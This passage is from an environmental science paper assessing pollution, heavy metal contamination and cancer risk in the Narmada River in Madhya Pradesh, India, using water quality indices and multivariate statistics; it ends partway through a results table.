status in a single number by aggregating the values of different physicochemical parameters [18]. The WQI such as national sanitation foundation water quality indices (NSFWQI), comprehensive pollution index (CPI) and heavy metal pollution index (HPI) are proved to be trustworthy and most commonly used to classify the surface WQ [19]. In this study, the estimated data on the physicochemical parameters data were used to evaluate CPI, while the heavy metal concentration data were used to evaluate HPI for the respective sampling locations in river Narmada. Moreover, risk assessment index (RAI) and cancer risk index (CRI) [2022] was evaluated to predict the possibilities of carcinogenic impact on human due to direct drinking of river water. Furthermore, environmetrics which involves multivariate statistical methods like principal component analysis (PCA) and hierarchical cluster analysis (HCA) [23, 24] was used to develop a composite indicator from the entire heavy metal datasets, and to identify the probable sources that significantly affect river WQ in the area under study. ### 2.1. Details of the Study Area River Narmada is the largest west flowing peninsular perennial river in central part of India. It originates from Maikala Hills near Amarkantakin Anuppur District of M.P flowing through Deccan traps towards western direction, and hemmed between Satpura and Vindhyan hills [15]. It covers a total length of 1,312 km through the state of M.P, draining total area of 98,796 km2 before merging with the Arabian Sea via the Gulf of Cambay near Bharuch city of Gujarat [11]. River Narmada basin lies from latitudes 21°20′N to 23°45′N and longitudes 72°32′E to 81°45′E, and it is characterized by humid tropical climatic condition with an average 1,178 mm of annual rainfall. This river is joined by 41 tributaries (19 on the right bank and 22 are on the left bank), of which Banjar, HiranTawa, Burhner, Kundi, Chota-Tawa, and Orsang rivers are the major tributaries [12]. Considerably, river Narmada is a lifeline of Madhya Pradesh, draining the major land area of 85,938 km2 (~87% of total river basin area) from east to west boundary of the state. Considering the entrance of drains, tributaries, and land-use pattern, the surface water samples were collected from selected 23 different sampling locations (Amarkantak to Koteshwar) for assessment of water pollution in the river Narmada. The step to step procedure followed to carry out this study has been represented in a flow chart, shown in Fig. 1(a). The details of all water sampling locations are shown in Table S1 of supplementary information (SI) and their locations are shown in Fig. 1(b), produced through ArcGIS 10.1 software. ### 2.2. Sample Collection and Analysis At each sampling location, the subsurface water samples were collected from the shore side of river Narmada during winter season from November 2017 to March 2018. The samples were collected during the day time between 10:00 am to 11:00am at each sampling location. The collected composite water samples were filled in airtight acid rinsed plastic containers of 500 mL capacity and stored at 4°C without freezing to avoid unpredictable changes before analysis. Three containers were filled with water samples at each location, of which, one sample was fixed in biochemical oxygen demand (BOD) bottles for the analysis of BOD5, while two sample containers (in which no fixing reagents were added) were used for the analysis of other WQ parameters. It is to be noted that the parameters like surface water temperature (WT), dissolved oxygen (DO), pH and electrical conductivity (EC) were analysed at sampling sites using portable analytical instruments, shown in Table S2 of SI. The collected water samples were transported to the laboratory within 24 h for further analysis. The analysis of each parameter was carried out through an experimental procedure demonstrated as per APHA [25].The experimental procedure for analysis of WQ parameters with their abbreviation, measurement unit and standard acceptable limit in drinking water (prescribed as per BIS [26] and WHO [27]), shown in Table S2 of SI. Each experiment was carried out in a replicate of three and mean value of observations were considered to avoid the uncertainty. ### 2.3. Water Quality Indices (WQI) In this study, the WQI like CPI, HPI, RAI and CRI were used to analyse the overall status of water quality in river Narmada. The indices are elaborately described as follow: #### NSFWQI It is the most commonly used WQI for the classification of WQ status in freshwater bodies around the world [19]. It involves parameters like DO, WT, pH, BOD, faecal coliform, total solid (TS) and turbidity. The mathematical equation (Eq. (1)) used to evaluate NSFWQI is expressed as: ##### (1) $NSFWQI=∑i=1pWiIi$ where Wi is the weightage factor of the ith WQ parameter, p is the total number of parameters and Ii is the sub-index value of the ith parameter. The WQ status at sampling locations along river Narmada is classified by NSFWQI value in range from 0–100: that is, 0–25 (very poor quality); 25–50 (poor quality); 50–70 (medium quality); 70–90 (good quality); and 90–100 (excellent quality). #### CPI It is based on parameters (like DO, pH, BOD, EC, COD, alkalinity, turbidity, total dissolved solids (TDS), total hardness (TH) and chloride) whose standard acceptable concentration limits (SAL) in drinking water have been prescribed as per BIS [26] and WHO [27]. It has been proved to be a trustworthy method for meaningful classification of the overall WQ status in a freshwater body [28]. The mathematical equations (Eq. (2) and (3)) used to evaluate CPI are expressed below: ##### (2) $PIi=CiSi$ ##### (3) $CPI=1n∑i=1nPI$ where PI is the sub pollution index of ith parameter, Si is the SAL of ith parameter in drinking water, Ci is the analyzed concentration value of the ith parameter, and n is the total number of parameters. The WQ status could be classified by CPI value in range from 0–2 as: 0–0.20 (excellent quality); 0.21–0.4 (good quality); 0.41–1.00 (slightly polluted quality); 1.01–2 (moderately polluted quality); ≥ 2.01 (severely polluted quality). #### HPI It is widely used to estimate heavy metal contamination in a water body. HPI is evaluated on the basis of heavy metals whose SAL in drinking water has been prescribed as per BIS [26] and WHO [27]. It is a single factor index that classifies the water contamination and degree of toxicity contributed by heavy metals in a water body [19, 29]. The mathematical equations (Eq. (4) and (5)) used to evaluate HPI are expressed below: ##### (4) $MI=∑i=1nCi/Si$ ##### (5) $HPI=√(12(MImax2+MIaverage2))$ where MI is the sub-index of ith heavy metal, Si is SAL of ith metal, and Ci is the concentration of ith heavy metal. The heavy metal contamination in water could be classified by HPI value in range from 0–3 as: HPI ≤ 1 (slightly contaminated water); 1–2 (contaminated water); 2–3: (moderately contaminated water); and HPI ≥ 3 (severely contaminated water). #### RAI RAI is commonly used to estimate the probable occurrence of human health risk over a particular time period on exposure to the hazardous chemicals whose reference dose (RFD) is prescribed in RAIS database [30]. According to Lee et al. [31], the health risk assessment involves identification of pollutants, rate of pollutant exposure, toxicity response dose of pollutant, and characterization of biotic risk due to the pollutant. In this study, RAI was evaluated by using the concentration data of all heavy metals for the respective sampling locations. The RAI value can be evaluated by the following mathematical equations (Eq. (6), (7) and (8)) as: ##### (6) $ADDi=(Ci×IR×ED×EF)/(BW×AT)$ ##### (7) $HQi=ADDi/RFDi$ ##### (8) $RAI=∑i=1nHQi$ where ADD denotes average daily dose of the ith heavy metal and RFD reference dose of the ith heavy metal, Ci is the analysed concentration value of the ith heavy metal, ED denotes exposure duration, EF denotes exposure frequency, AT denotes average time, BW denotes human body weight, IR denotes ingestion rate and HQ is the sub-index of ith heavy metal. The RFD value (as per RAIS database) of manganese (Mn), copper (Cu), iron (Fe), Chromium (Cr), zinc (Zn), arsenic (As), cadmium (Cd), lead (Pb), cobalt (Co) and nickel (Ni) is shown in Table S3 of SI. RAI value can be classified into two categories where RAI < 1 indicates acceptable carcinogenic risk and RAI ≥ 1 indicates unacceptable carcinogenic risk. However, the risk of cancer means the probability of a human to develop cancer after exposure of contaminants to a given life period [32]. #### CRI The probability of cancer risk is determined by oral slope factor (SFO) value of hazardous cancer-causing chemicals. In RAIS database, SFO value has been derived for Cr, As, and Pb, shown in Table S3 of SI. The cancer risk can be mathematically expressed as follows (Eq. (9)): ##### (9) $Cancer risk index (CRI)=ADDi×SFO$ The cancer risk values evaluated at a sampling location can be classified into two categories where value ≤1×10−6 indicates acceptable level or very low risk of cancer, which means 1 person per 1,000,000, might be prone to cancer as a consequence of the exposure, while value ≥ 1×10−6 indicates a high risk of cancer [20]. ### 2.4. Environmetrics Techniques The environmetrics statistical analysis of heavy metal concentration datasets was performed through HCA and PCA, using SPSS version 16.0 software. The HCA based on Ward method was used to develop the cluster of sampling locations that have similar pollution load. The PCA was used to classify the trend of metal contamination and to predict the input source of contamitants in the river. ### 3. Results and Discussion The physicochemical and biological characteristics of water in river Narmada was assessed at 23 water sampling locations (R1–R23) during winter season (November 2017 to March 2018). The data on water quality parameters and heavy metals concentration, obtained during laboratory analysis of collected water samples at sampling locations (R1–R23) are shown in Table S4 and S5 of SI, respectively in terms of mean and standard deviation of triplicate observations. The analysed values of WT, TDS, and DO were obtained in range 21°C–26°C (R4), 24–442 mg/L, and 5.7–8.5 mg/L, respectively at all sampling locations, which were found as per SAL. The pH values of water samples were obtained in range 7.1–8.8, which exhibit slightly alkaline water quality of river Narmada that could be due to the presence of carbonates and bicarbonates of magnesium and calcium in the water. The pH value was found within SAL (6.5–7.5) at locations R14, R15, R16, and R22, while it was found to be unacceptable (pH value>7.5) at other locations. The EC value at locations R1, R2, R3, and R4 was obtained >600 μS/cm, which indicates the presence of salt and inorganic materials in the water. The maximum alkalinity concentration of 227 mg/L (> SAL 200 mg/L) was found at location R16, while it was obtained within SAL at other locations, indicating the presence of carbonates, bicarbonates, and hydroxides in the water. High values of alkalinity might be due to excessive input of organic waste enriched wastewater from agricultural and domestic area [11]. Comparative analysis of TDS and TS concentration reveals that the locations R8, R12, R14, R16, and R19 are significantly affected by high load of suspended solids (> 100 mg/L) in the water. Considerably, the TH concentration was obtained as 310 mg/L, 400 mg/L, 340 mg/L, and 400 mg/L at locations R12, R13, R16, and R17, respectively which is more than SAL, indicating the presence of chlorides, sulphates, and nitrates of calcium and magnesium in the water. However, the chloride concentration was obtained in range from 13–244 mg/L at all sampling locations, which is within the SAL. The variation in chloride concentration might be due to uncontrolled discharge of sewage and agricultural wastewater in the river Narmada. The turbidity of collected water samples was obtained in range 1.1–15 NTU (above SAL of 1 NTU) at all sampling locations. In another analysis, the BOD concentration was found to be acceptable at locations R15, R18, R19, R20, R21,and R23, while at other locations, it was more than SAL (5 mg/L), indicating high organic loading in the river. Consequently, the COD concentration was obtained as 9 ± 0.01 mg/L and 13 ± 0.01 mg/L at locations R21and R23, respectively which is acceptable as per SAL (20 mg/L COD), while at other locations, the higher concentration of COD (> 20 mg/L of SAL) indicates the heavy load of organic and inorganic pollutants. Moreover, as per BIS 2012, the faecal coliform should not be detected in 100 mL drinking water sample. In this study, the biological analysis of water samples indicates the presence of faecal coliform falling in the range of 1.1–8.9 MPN/100 mL (permissible faecal coliform ≤ 50). In the available literature, Sharma et al. [11] have elaborately reported the physiochemical characteristic of water along the stretch of river Narmada and analysed the data through PCA technique. They have reported that the parameters like total alkalinity, COD, TDS, TH, and chloride of water in winter season varied in ranges from 26 to 71 mg/L, 5.1–13.4 mg/L, 698–1,585 mg/L, 70.25 to 131.2 mg/L, and 21.2 to 66 mg/L, respectively. Compared to these reported data, the variation in concentration of these parameters has increased significantly in this study due to excessive input of wastewater in river Narmada, in recent past years. Based on the comparative analysis of these physicochemical and biological parameters to SAL, it is revealed that the WQ of river Narmada is not suitable for drinking purposes and requires prior treatment for further use. The heavy metal concentration was investigated in the collected water samples at all sampling locations. Compared to SAL, the concentration of Cu was found to be higher (> 50 μg/L SAL) at locations R1 to R11, Pb was found to be higher (> 10 μg/L SAL) at R1 to R4, and Mn was found to be higher (> 100 μg/L SAL) at R23, while other heavy metals were found within their SAL at all sampling locations. The major heavy metal contamination was observed at the initial sampling locations (R1–R10), which lies in the industrial zone of M.P. The heavy metal concentration data obtained at all sampling locations were used to evaluate their mean and median value of data that represent the overall metal concentration in river Narmada along the stretch of M.P. The variation in data of heavy metals at the overall sampling locations is represented as box and whiskers plot shown in Fig. 1(c). Although, Fe concentration in the river water is found within SAL, it is due to variation in Fe concentration from various natural sources (i.e., runoff from weathering rock area in the catchments). Considerably, there is variation in concentration of Cu, Zn, and Pb, which indicates the input of untreated industrial wastewater in the river while other metals are close to their mean value. The comparative analysis of its concentration in the river reveals that Cu is the most abundant heavy metal found, followed by others- Fe > Zn > Mn > Pb > Cr > Ni > As > Cd > Co (Fig. 1(d)). Based on the above analysis, it was found that the river water is in the polluted categories and therefore, it is not suitable for drinking as per BIS [26] and WHO [27] water quality standard. However, to draw meaningful information, it is required to classify the overall water pollution status at respective sampling locations in the river. ### 3.1. Water Quality Index Results In this study, the indices like NSFWQI, CPI, and HPI are evaluated to classify the status of water pollution at the sampling locations in river Narmada, the indices data are shown in Table 1. The NSFWQI result reveals that the water pollution at sampling location (R1–R4, R6–R8, R13, R16, R17, and R23) falls under medium range (50–70), while it is good at other locations. Although, NSFWQI is evaluated on the basis of limited WQ parameters, thus it gives a predictable status of WQ [19]. Further, it is to be noted that there is no single standard WQI reported yet, which could be universally applied to assess the WQ in a water body. In the recent trend, the CPI is one of the most trustworthy acceptable WQI commonly used to classify the accurate water pollution status in a water body, which is based on SAL value of physicochemical parameters [28]. The CPI was evaluated at all sampling locations, which indicates severely polluted water quality at sampling locations R1–R4, R6–R8, R13 and R14, moderately polluted water quality at R5, R9–R12, R15–R18, R21 and R23, while slightly polluted water quality at the other locations, as shown in Fig. 2(a). The average CPI value of 1.98 was evaluated for water quality in river Narmada, which indicates the moderately polluted water quality that is not suitable for drinking purposes. Among all sampling locations, the highest CPI value of 7.52 was evaluated at location R1 (origin site of the river), which was found to be most affected due to heavy load of pollutants. River Narmada receives more pollution load near its origin, which considerably degrades the natural quality of water. The comparative analysis of NSFWQI and CPI results reveals almost similar trend in variation of WQ at all sampling locations (Fig. 2(c)). Thus, NSFWQI and CPI could be used to predict satisfactory and acceptable WQ trends in a water body. However, both indices do not involve the concentration data of heavy metals to classify the metal contamination in a water body [28]. To assess the heavy metal contamination in the water of river Narmada, HPI was evaluated using heavy metal concentration data obtained during laboratory analysis and their respective SAL value. The water quality at sampling locations R1–R4 was found to be severely contaminated (HPI value > 3) due to heavy metals, which reveals that it is not suitable for drinking purposes as shown in Fig. 2(b). However, the metal contamination in the river decreases towards the downstream sampling locations from contaminated (R5–R7) to slightly contaminated (R11–R22) status, which might be due to sedimentation of metals and reduced input of metal carrying wastewater in the river. Also, the sampling locations R11–R22 lies in the forest cover area, which supports the bio-accumulation of heavy metals, and thus reduces metal contamination [12]. The water quality at sampling location R23 lies in mining area and is found to be moderately contaminated, which could be due to its geomorphologic location and high input of Fe and Mn carrying runoff entering the river from surrounding rock weathering areas [33]. The average NSFWQI, CPI, and HPI values of river Narmada were evaluated to be 70.35, 1.98, and 1.35 respectively, which reveals that the river water is moderately polluted and not suitable for drinking purposes. Moreover, due to the presence of toxic heavy metals in the river water, RAI was evaluated to assess the biotic risk to human health if water is used for drinking purposes. The RAI is based on RFD (obtained from RAIS database) and ADD values of heavy metals, which was evaluated on basis of heavy metal concentration data obtained during laboratory analysis of the water samples at all sampling locations shown in Table 2. The RAI result indicates an unacceptable biotic risk or cancer risk to human health if water is lifelong regularly used for drinking purposes in the vicinity of the river stretch without prior treatment. Furthermore, the occurrence of cancer risk to human health was verified by the evaluation of cancer risk value, which was based on ADD and SFO value of heavy metals. In this study, the SFO value of Cr, As, and Pb were found in the RAIS database. Considerably, a cancer risk value > 1×10−6 was obtained at all sampling locations shown in Table 2, which indicates the certainty of cancer risk to human health. ### 3.2. Hierarchical Cluster Analysis Result The clustering of water sampling locations on the basis of similarity and dissimilarity of heavy metal contamination was carried out using HCA through Ward method based on the dataset of heavy metals obtained during laboratory analysis. In this study, the agglomeration schedule in HCA gained two clusters, which is represented as dendrogram in Fig. 3(a). The cluster 1 contains sampling locations R1, R2, R5, R9, R13, R12, R14, R15, R18, and R19, while cluster 2 contains other sampling locations. Considerably, the sampling locations R15, R19, R12, and R5 were found in both clusters, which could be due to the impact of their geomorphologic position and heavy metal input from both point and no-point sources. The first cluster signifies the input of heavy metals in the river water mainly from the anthropogenic sources, while cluster two indicates the heavy metal contamination due to both anthropogenic and natural sources [19]. Most of the sampling locations of downstream regions were grouped in second cluster that confirms the input of heavy metals through runoff from forest cover and agricultural area. ### 3.3. Inter-Metal Relationships in River Narmada In order to classify the pathway and input source of heavy metals in the river water, Pearson correlation coefficient analysis was performed using heavy metal concentration data shown in Table 3. It can be clearly observed that the Cu has strongest correlation coefficient with Pb and Zn to be 0.998, and 0.986 respectively, which indicate the input of wastewater from electroplating industries [8, 34]. The strong positive correlation coefficient between Cr-As of 0.932, and Cr-Fe of 0.873 indicates the input of agricultural wastewater through runoff into the river. In addition, the Cr-Ni has gained a strong positive correlation coefficient of 0.914, which indicates the input of mining industrial wastewater into the river [35]. The heavy metal Mn has strong correlation with Fe, As, and Ni of 0.4, 0.163, and 0.0198 respectively, which confirms its input in the river from natural mining sites and mountainous agricultural runoff. River Narmada flows through basaltic rock mountainous region in the peninsular part of India [7]. Hence, the input of Cr, Mn and Fe are commonly added to the river water through runoff from those mountainous areas. These heavy metals are commonly extracted from their ores in mountainous regions [35]. The strong positive correlation between Zn-Pb, and Zn-Co of 0.981, and 0.842, respectively indicates their input source as runoff sediment from natural rock weathering areas. The positive correlation coefficient of 0.462 is found between Cd-As, which are common heavy metals used by fertilizer industries, which give rise to the input of agricultural runoff into the river. The positive correlation coefficient between heavy metals demonstrates their actual characteristics, mutual dependency and common input source. Moreover, it is revealed that the river Narmada receives metal-contaminated wastewater from both anthropogenic and natural sources. ### 3.4. Principal Component Analysis Result To validate the relationship between heavy metals, in order to extract trustworthy information and to ensure their input source, PCA was carried out using heavy metal concentration data through varimax normalized rotation method. Primarily, in order to estimate the number of components during PCA, scree plot of heavy metal datasets was constructed, as shown in Fig. 3(b). From the scree plot, the major break could be observed after the second component, which indicates that the first two components could produce more meaningful information [18]. The component eigen value curve in scree plot has dropped after the third component, which indicates that the third component might be useful for better interpretation of the datasets. Thereafter, Kaiser–Meyer–Olkin (KMO) and Bartlett’s test of data was executed before performing the component analysis. The KMO sampling adequacy was obtained as 0.664 with Bartlett’s test of sphericity (approx. Chi-Square:413.750; degree of freedom: 45; statistical significance: 0.0), which indicates the suitability of the datasets for PCA. The present study reveals that there is no improvement in the WQ of river Narmada in sampling years 2017–18, as the CPI value > 2 (poor WQ) was obtained at most of the sampling locations. The river water is polluted due to input of untreated/partially treated wastewater from industrial and domestic sectors. The present result is supported by Gupta et al. [7], who reported the poor WQ in the river and its unsuitability for human consumption. Jain et al. [15] examined metal fractions on bed sediment of river Narmada and reported that the heavy metals (like Mn, Cu, Ni, Cr, Pb, Zn, and Cd) concentrations in sediments were higher than their standard shale values. They suggested that the anthropogenic activities, soil erosion, and agricultural runoff were the major sources of pollution in river Narmada. In the current scenario, the biotic risk due to imbalanced concentration of heavy metals in the river still exists as the HPI > 3 was obtained in this study at the sampling locations (R1, R2, R3, and R4) near the river origin. Hence, it is necessary to review the existing conservation plan so as to include the regular monitoring and treatment strategies for wastewater entering the river, which will improvise the assimilative capacity of the river. A comparative analysis of average heavy metal concentration (estimated in this study) dissolved in river Narmada with the other Indian rivers average is incorporated in Table 5. Based on the analysis of heavy metals data (shown in Table 5), it is revealed that the average Cu concentration in river Narmada is higher than most of the Indian River’s average except river Ganga, Sabarmati, and Damodar. While the estimated average concentration of other dissolved heavy metals in this study is comparatively lower than most of the Indian River’s average. Although, heavy metal contamination in river Narmada is lower than average heavy metal concentration in other Indian rivers, present study reveals that the river water is moderately contaminated and not suitable for drinking purposes. Therefore, it is suggested that the remedial measures should be considered including prevention or strict control on discharge of untreated/partially treated wastewater in the river, proper treatment of industrial wastewater, regular monitoring of water quality, diversion of drains and constructing bunds or buffer strips to check agricultural runoff. This is to improvise the self-assimilative capacity and ecological health of river Narmada. ### 4. Conclusions The physicochemical and biological characteristics of WQ in river Narmada have been assessed, considering 23 different sampling locations along the stretch of the river. The evaluation of overall water pollution status in the river was evaluated using NSFWQI, CPI and HPI. The average NSFWQI, CPI, and HPI of river were evaluated to be 70.35, 1.98, and 1.35, respectively, which reveals that the river water falls under moderately polluted and it is not suitable for drinking purposes. Furthermore, the probability of cancer risk to human health on exposure to river water is evaluated using RAI and CRI. Considerably, the RAI and CRI falling under less than one signify the high probability of cancer risk due to high concentration of copper (Cu > 50 μg/L), lead (Pb > 10 μg/L) and manganese (Mn > 100 μg/L). The relative abundance of average heavy metal concentration in the river was obtained to be Cu > Fe > Zn > Mn > Pb > Cr > Ni > As > Cd > Co. Based on heavy metal contamination, all the sampling locations are obtained in two clusters during hierarchical cluster analysis. The metal relationship between Cu-Pb and Zn-Cu gained high Pearson correlation coefficient of 0.998, and 0.986, respectively, which indicates the input of metal carrying untreated/partially treated wastewater in the river from electroplating industries. Further, PCA gained three PCs and all the heavy metals were positively loaded in PC2 which confirmed their input in the river Narmada from natural and anthropogenic sources. Therefore, it is suggested that river water must be treated before used for drinking purposes to avoid unpredictable risks to human health. This study provides the future direction to the researchers, environmentalists and water resources planners and managers to take necessary action to maintain the aesthetic value of the rivers and further protract aquatic biodiversity. ### Acknowledgment The author are highly thankful to Amrish Kumar (DPPE, IITR, India) and Vivek Kumar (DPPE, IITR, India) who helped in laboratory testing of water samples and provided raw data for further analysis. ### Notes Author Contributions S.M. (Postdoc fellow) and A.K. (Associate Professor) generated the concept followed by discussion and article preparation. Both authors contributed equally in completing the article. ### References 1. Eliku T, Leta S. Spatial and seasonal variation in physicochemical parameters and heavy metals in Awash River, Ethiopia. App Water Sci. 2018;8:177 2. Pradhan S, Kumar P, Mehrotra I. River pollution: Assessment of hydro-philic and phobic nature of persistent organic contaminants. Environ Nanotech Monit Manag. 2015;3:47–54. 3. Sharma BM, Becanova J, Martin S, et al. Health and ecological risk assessment of emerging contaminants (pharmaceuticals, personal care products, and artificial sweeteners) in surface and groundwater (drinking water) in the Ganges River Basin, India. Sci Total Environ. 2019;646:1459–1467. 4. Sharma S, Dixit S, Jain P, Shah KW, Vishwakarma R. Statistical evaluation of hydrobiological parameters of Narmada River water at Hoshangabad City, India. Environ Monit Assess. 2008;143:195–202. 5. Yadav NS, Sharma MP, Kumar A. Ecological Health Assessment of Chambal River, India. J Mater Env Sci. 2015;6(3)613–618. 6. Mishra S, Sharma MP, Kumar A. Pollution characteristic and health risk assessment of toxic chemicals of surface water in Surha Lake, India. J Mat Environ Sci. 2016b;7:799–807. 7. Gupta N, Pandey P, Hussain J. Effect of physicochemical and biological parameters on the quality of river water of Narmada, Madhya Pradesh, India. Water Sci. 2017;31:11–23. 8. Chen Q, Lu Z, Yan D, Qi W, Xin S. Source analysis and health risk of heavy metals in the different seasons from Taizihe River, China. Acta Ecolo Sinica. 2018;40:64–71. 9. Singh V, Sharma MP, Sharma S, Mishra S. Bio-assessment of River Ujh using benthic macro-invertebrates as bioindicators, India. Int J River Basin Manag. 2019;17:79–87. 10. Gour S, Jaloree S, Gour M. Water Quality Assessment using Association Rule Mining for River Narmada. Indian J Sci Tech. 2016;9:1–5. 11. Sharma A, Bora CR, Shukla V. Evaluation of Seasonal Changes in Physico-chemical and Bacteriological Characteristics of Water from the Narmada River (India) Using Multivariate Analysis. Nat Resour Res. 2013;22:283–296. 12. Gupta H, Chakrapani GJ. Temporal and spatial variations in water flow and sediment load in Narmada River Basin, India: natural and man-made factors. Environ Geol. 2005;4–5:579–589. 13. Malviya P, Dwivedi AK. Physico-chemical parameters of Narmada River Water: A review. Int J Chem Stud. 2015;3:1–4. 14. Katakwar M. Narmada river water: Pollution and its impact on the human health. Int J Chem Stud. 2016;4:66–70. 15. Jain CK, Gupta H, Chakrapani GJ. Enrichment and fractionation of heavy metals in bed sediments of River Narmada, India. Environ Monit Assess. 2008;141:35–47. 16. Bilgin A. Evaluation of surface water quality by using Canadian Council of Ministers of the Environment Water Quality Index (CCME WQI) method and discriminant analysis method: a case study of Coruh River Basin. Environ Monit Assess. 2018;190:554 17. Zhang L. Big Data, Knowledge Mapping for Sustainable Development A Water Quality Index Case Study. Emerg Sci J. 2019;3:249–254. 18. Tripathi M, Singal SK. Use of Principal Component Analysis for parameter selection for development of a novel Water Quality Index: A case study of river Ganga India. Ecol Indicat. 2019;96:430–436. 19. Mishra S, Kumar A, Shukla P. Study of Water Quality in Hindon River Using Pollution Index and Environmetrics, India. Desalin Water Treat. 2015;56(3)1–10. 20. Wongsasuluk P, Chotpantarat S, Siriwong W, Robson M. Heavy metal contamination and human health risk assessment in drinking water from shallow groundwater wells in an agricultural area in Ubon Ratchathani province, Thailand. Environ Geochem Health. 2014;36:169–182. 21. Singh KR, Dutta R, Kalamdhad AS, Kumar B. Risk characterization and surface water quality assessment of Manas River, Assam (India) with an emphasis on the TOPSIS method of multiobjective decision making. Environ Earth Sci. 2018;77:780–785. 22. Xiao J, Wang L, Deng L, Jin Z. Characteristics, sources, water quality and health risk assessment of trace elements in river water and well water in the Chinese Loess Plateau. Sci Total Environ. 2019;650:2004–2012. 23. Yilma M, Kiflie Z, Windsperger A, Gessese N. Assessment and interpretation of river water quality in Little Akaki River using multivariate statistical techniques. Int J Environ Sci Tech. 2018;16:3707–3720. 24. Hamil S, Arab S, Chaffai A, Baha M, Arab A. Assessment of surface water quality using multivariate statistical analysis techniques: a case study from Ghrib dam, Algeria. Arab J Geosci. 2018;11:754–761. 25. American Public Health Association (APHA). AWWA and WPCF Standard Methods for the Examination of Waters and Waste Waters. 22nd ed.Washington DC: 2011. 26. Bureau of Indian Standards (BIS: 10500). Indian standard specification for drinking water. Second Revision. New Delhi: 2012. 27. Guidelines for drinking-water quality: fourth edition incorporating the first addendum. Geneva: World Health Organization (WHO); 2017. Licence: CC BY-NC-SA 3.0 IGO978-92-4-154995-0 28. Chaudhary M, Mishra S, Kumar A. Estimation of water pollution and probability of health risk due to imbalanced nutrients in River Ganga, India. Int J River Basin Manag. 2017;15:53–60. 29. Yang CL, Guo RP, Yue QL, Zhou K, Wu ZF. Environmental quality assessment and spatial pattern of potentially toxic elements in soils of Guangdong province, China. Environ Earth Sci. 2013;70:1903–1910. 30. The Risk Assessment Information System. Chemical toxicity values (RAIS database). [cited 18 December 2018]. Available from: https://rais.ornl.gov/cgi-bin/tools/TOX_search?select=chemmeta 31. Lee JS, Chon HT, Kim KW. Human risk assessment of As, Cd, Cu and Zn in the abandoned metal mine site. Environ Geochem Health. 2005;27:185–191. 32. Adamu CI, Nganje TN, Edet A. Heavy metal contamination and health risk assessment associated with abandoned barite mines in Cross River State, south eastern Nigeria. Environ Nanotech Monit Manag. 2015;3:10–21. 33. Gupta H, Chakrapani GJ. Temporal and spatial variations in water flow and sediment load in the Narmada River. Current Sci. 2007;92:679–684. 34. Liu J, Zhang XH, Tran H, Wang DQ, Zhu YN. Heavy metal contamination and risk assessment in water, paddy soil, and rice around an electroplating plant. Environ Sci Poll Res. 2011;18:1623–1632. 35. Qu B, Zhang Y, Kang S, Sillanpaa M. Water quality in the Tibetan Plateau: Major ions and trace elements in rivers of the “Water Tower of Asia”. Sci Total Environ. 2019;649:571–581. 36. Dutta S, Dwivedi A, Kumar MS. Use of water quality index and multivariate statistical techniques for the assessment of spatial variations in water quality of a small river. Environ Monit Assess. 2018;190:718–724. 37. Rajkumar H, Naik PK, Rishi MS. Evaluation of heavy metal contamination in soil using geochemical indexing approaches and Chemometric Techniques. Int J Environ Sci Tech. 2018;16:7467–7486. 38. Kumar RN, Solanki R, Kumar JIN. Seasonal variation in heavy metal contamination in water and sediments of river Sabarmati and Kharicut canal at Ahmedabad, Gujarat. Environ Monit Assess. 2013;185:359–368. 39. Giri S, Singh AK. Risk assessment, statistical source identification and seasonal fluctuation of dissolved metals in the Subarnarekha River, India. J Hazard Mat. 2014;265:305–314. 40. Sundaray SK, Nayak BB, Kanungo TK, Bhatta D. Dynamics and quantification of dissolved heavy metals in the Mahanadi river estuarine system, India. Environ Monit Assess. 2012;184:1157–1179. 41. Prasad MBK, Ramanathan AL, Shrivastav SK, Anshumali , Sexena R. Metal fractionation studies in surfacial and core sediments in the Achankovil river basin in India. Environ Monit Assess. 2006;121:77–102. 42. Chatterjee SK, Bhattacharjee I, Chandra G. Water quality assessment near an industrial site of Damodar River. India. Environ Monit Assess. 2010;161:177–189. 43. Singh VK, Singh KP, Mohan D. Status of heavy metals in water and bed sediments of river Gomti – a tributary of the Ganga River, India. Environ Monit Assess. 2005;105:43–67. 44. Sundaray SK. Application of multivariate statistical techniques in hydrogeochemical studies—a case study: Brahmani–Koel River (India). Environ Monit Assess. 2010;164:297–310. 45. Jain CK, Sharma MK. Heavy metal transport in the Hindon river basin, India. Environ Monit Assess. 2006;112:255–270. 46. Reza R, Singh G. Heavy metal contamination and its indexing approach for river water. Intern J Environ Sci Technol. 2010;7:785–792. 47. Nayak BB, Panda UC, Panigrahy PK, Acharya BC. Dynamics of heavy metals in Dhamara Estuary of Orissa state in India. Chem Environ Res. 2001;10:203–218. 48. Mishra S, Kumar A, Yadav S, Singhal MK. Assessment of heavy metal contamination in water of Kali River using principle component and cluster analysis, India. Sustain Water Resour Manag. 2018;4:573–581. 49. EPA. US EPA Office of Water. Office of science and technology (EPA-822-R-00-001) [online]. Environmental Protection Agency Region I; Washington, DC 20460: 2004. [cited 18 December 2018]. Available from: www.epe.gov/safewater 50. US EPA. Exposure Factor Handbook (EPA/600/p-95/002Fa) (Update to Expo-sure Factors Handbook EPA/600/8-89/043). Washington, DC: Environmental Protection Agency Region I; 1977. ##### Fig. 1 Assessment of water quality in river Narmada: (a) Schematic diagram of the research methodology; (b) Sampling locations in river Narmada in state Madhya Pradesh, India; (c) Box and whiskers plot of variation and spatial distribution of heavy metals; (d) Pie plot representing abundance of heavy metals in the river. ##### Fig. 2 Water quality status: (a) CPI based water quality status in river Narmada; (b) Trend analysis of heavy metal contamination in river Narmada; (c) Variations of NSFWQI and CPI at the sampling locations in river Narmada. ##### Fig. 3 HCA and PCA of heavy metal dataset: (a) Dendrogram of heavy metal contamination at sampling location using Ward method; (b) Scree plot of components; (c) Component loadings and score plot of heavy metals. ##### Table 1 Evaluation of Water Quality Indices and Risk Assessment Index at Sampling Location in River Narmada Sampling location NSFWQI CPI HPI RAI Value Status Value Status Value Status Value Status R1 65 Medium 7.52 Severely 4.98 Severely 6.90 Unacceptable R2 69 Medium 2.69 Severely 5.48 Severely 7.31 Unacceptable R3 65 Medium 2.87 Severely 5.28 Severely 7.97 Unacceptable R4 65 Medium 2.81 Severely 3.71 Severely 5.25 Unacceptable R5 72 Good 1.51 Moderately 1.08 Contaminated 1.95 Unacceptable R6 67 Medium 2.17 Severely 1.27 Contaminated 2.25 Unacceptable R7 68 Medium 0.97 Slightly 1.10 Contaminated 2.00 Unacceptable R8 69 Medium 2.01 Severely 0.94 Slightly 1.82 Unacceptable R9 74 Good 1.01 Moderately 0.71 Slightly 1.57 Unacceptable R10 74 Good 1.76 Moderately 1.05 Contaminated 1.87 Unacceptable R11 70 Good 1.37 Moderately 0.69 Slightly 1.73 Unacceptable R12 71 Good 